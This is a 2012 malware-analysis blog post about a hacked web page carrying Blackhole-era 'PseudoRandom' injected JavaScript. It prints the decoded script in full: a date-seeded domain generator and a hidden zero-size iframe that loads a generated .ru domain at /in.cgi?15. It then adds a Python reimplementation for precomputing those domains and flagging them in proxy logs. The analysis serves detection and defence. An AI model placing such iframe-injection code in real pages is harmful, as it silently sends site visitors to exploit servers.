Saturday, September 1, 2012

Pseudo Randoms Infector URL - An idea to grep it (a logical bug to be used)

A while ago we had the PseudoRandom infector spreading via Blackhole.
Lucky me to have just bumped into one; I thought it had already been wiped out clean.
Here's the story of it.
I got the hint of the infected URL from spam caught by my own spam filter.
Here's the URL:
hxxp://www.strow.es/proyectos/destacado.html
As usual fetch it:
--03:48:46--  hxxp://www.strow.es/proyectos/destacado.html
           => `destacado.html'
Resolving www.strow.es... 212.59.199.22
Connecting to www.strow.es|212.59.199.22|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 22,808 (22K) [text/html]

100%[====================================>] 22,808        29.32K/s

03:48:48 (29.25 KB/s) - `destacado.html' saved [22808/22808]
Let's see the timestamp of it...
-rwx------ 1 r00t b33r 22808 Aug 8 02:29 destacado.html
↑Ah, one of the old infected files that got left over. It is a common HTML file, nothing special, except that it was injected with JavaScript; the code was placed after the tag, like below:
You can see the code in pastebin --->>>>[HERE]
This is actually the PseudoRandom JS code, i.e. the value handed to eval(), shown below. Of course it is not exactly as it sits in the page; you cannot run it by just pasting it.
function nextRandomNumber() {
    // Lehmer-style step; Q is a float (M / A), so this is all float arithmetic
    var hi = this.seed / this.Q;
    var lo = this.seed % this.Q;
    var test = this.A * lo - this.R * hi;
    if (test > 0) {
        this.seed = test;
    } else {
        this.seed = test + this.M;
    }
    return (this.seed * this.oneOverM);
}

function RandomNumberGenerator(unix) {
    // seed built only from the victim's local month, day and 3-hour slot
    var d = new Date(unix * 1000);
    var s = Math.ceil(d.getHours() / 3);
    this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
    this.A = 48271;
    this.M = 2147483647;
    this.Q = this.M / this.A;
    this.R = this.M % this.A;
    this.oneOverM = 1.0 / this.M;
    this.next = nextRandomNumber;
    return this;
}

function createRandomNumber(r, Min, Max) {
    return Math.round((Max - Min) * r.next() + Min);
}

function generatePseudoRandomString(unix, length, zone) {
    var rand = new RandomNumberGenerator(unix);
    var letters = "buaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
    var str = '';
    for (var i = 0; i < length; i++) {
        str += letters[createRandomNumber(rand, 0, letters.length - 1)];
    }
    return str + '.' + zone;
}

setInterval(function () {
    try {
        if (typeof iframeWasCreated == "undefined") {
            var unix = Math.round(+new Date() / 1000);
            var domainName = generatePseudoRandomString(unix, 16, 'ru');
            // hidden 0x0 iframe pointing at the generated domain; the path is fixed
            ifrm = document.createElement("IFRAME");
            ifrm.setAttribute("src", "hxxp://" + domainName + "/in.cgi?15");
            ifrm.style.width = "0px";
            ifrm.style.height = "0px";
            ifrm.style.visibility = "hidden";
            document.body.appendChild(ifrm);
            iframeWasCreated = true;
        }
    } catch (e) {
        iframeWasCreated = undefined;
    }
}, 100);
The paste of the code is here ===>>>>[HERE]. Well, this will lead you to the landing page below:
hxxp://xkqaiqqirreqaqwd.ru/in.cgi?15
↑But don't get upset, since nothing is in there anymore ;-) My point is for you to see how they code the PseudoRandom part. Read the code well and you will know how it works. The stupid thing about using PseudoRandom is that there is no "really" random URL: you have to leave something fixed to be merged into the URL. In the case of this sample it is easy to grep "/in.cgi?" and see what happened in the domain list.
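As an added example (not the blog's own code and not the malware's), here is the same generator reimplemented in Python from the JavaScript above, so a defender can precompute the candidate domains and match them, together with the fixed "/in.cgi?" path, against proxy logs. The seed is built only from the victim's local month, day and 3-hour slot, so there are at most nine domains per day and zone and the set repeats every year. The constants are copied from the script; the proxy log lines are constructed for this example and the function names are mine.

```python
"""Added example, not the blog's or the malware's own code: the injected
page's domain generator reimplemented in Python for defensive precomputation,
plus a grep-style check for the fixed "/in.cgi?" path in proxy logs."""
import datetime
import math
import re

# Constants copied from the injected JavaScript shown above.
ALPHABET = "buaxoqeriqwkgfkdyenzossqlxfqayvpr"
A = 48271
M = 2147483647
Q = M / A            # the script divides as floats, not integers
R = M % A
ONE_OVER_M = 1.0 / M


def js_round(x):
    """Mimic JavaScript Math.round for non-negative x (halves go up)."""
    return math.floor(x + 0.5)


def seed_for(month0, day, hour):
    """Seed as RandomNumberGenerator() builds it from the victim's local clock:
    0-based month, day of month and a 3-hour slot. Year and minutes never enter."""
    slot = math.ceil(hour / 3)
    return 2345678901 + month0 * 0xFFFFFF + day * 0xFFFF + js_round(slot * 0xFFF)


def next_random(seed):
    """One step of nextRandomNumber(): float division and a truncated
    remainder (fmod), exactly as JavaScript evaluates the original."""
    hi = seed / Q
    lo = math.fmod(seed, Q)
    test = A * lo - R * hi
    seed = test if test > 0 else test + M
    return seed, seed * ONE_OVER_M


def generate_domain(month0, day, hour, length=16, zone="ru"):
    """generatePseudoRandomString() for a given local month/day/hour."""
    seed = seed_for(month0, day, hour)
    chars = []
    for _ in range(length):
        seed, r = next_random(seed)
        chars.append(ALPHABET[js_round((len(ALPHABET) - 1) * r)])
    return "".join(chars) + "." + zone


def domains_for_day(month0, day, zone="ru"):
    """All domains a victim can reach on one calendar day: ceil(hour/3) only
    takes the values 0..8, so at most nine distinct names per day and zone."""
    found = []
    for hour in range(24):
        name = generate_domain(month0, day, hour, zone=zone)
        if name not in found:
            found.append(name)
    return found


# Constructed squid-style proxy log lines (not real traffic) for the check.
SAMPLE_LOG = """\
1346470126.512 10.0.0.5 TCP_MISS/200 GET http://www.strow.es/proyectos/destacado.html
1346470127.001 10.0.0.5 TCP_MISS/404 GET http://xkqaiqqirreqaqwd.ru/in.cgi?15
1346470130.233 10.0.0.7 TCP_HIT/200 GET http://example.org/cgi-bin/in.cgi?15
"""

# Hostname shape the generator can produce: 16 letters from its alphabet + zone.
DGA_HOST = re.compile(r"^[%s]{16}\.ru$" % "".join(sorted(set(ALPHABET))))


def flag_in_cgi_hits(log_text):
    """Return hosts whose request path starts with the fixed '/in.cgi?' and
    whose hostname has the generator's shape; the blog's grep, made stricter."""
    hits = []
    for line in log_text.splitlines():
        url = line.split()[-1]
        m = re.match(r"[a-z]+://([^/]+)(/.*)$", url)
        if m and m.group(2).startswith("/in.cgi?") and DGA_HOST.match(m.group(1)):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    now = datetime.datetime.now()           # the script uses the local clock
    for name in domains_for_day(now.month - 1, now.day):
        print(name)
    print("flagged:", flag_in_cgi_hits(SAMPLE_LOG))
```

Because the seed ignores the year, the nine names for any given month and day can be generated once and sinkholed or blocked ahead of time; the path check on its own is the cheap grep the post suggests, and the hostname shape filter cuts false positives from unrelated in.cgi scripts.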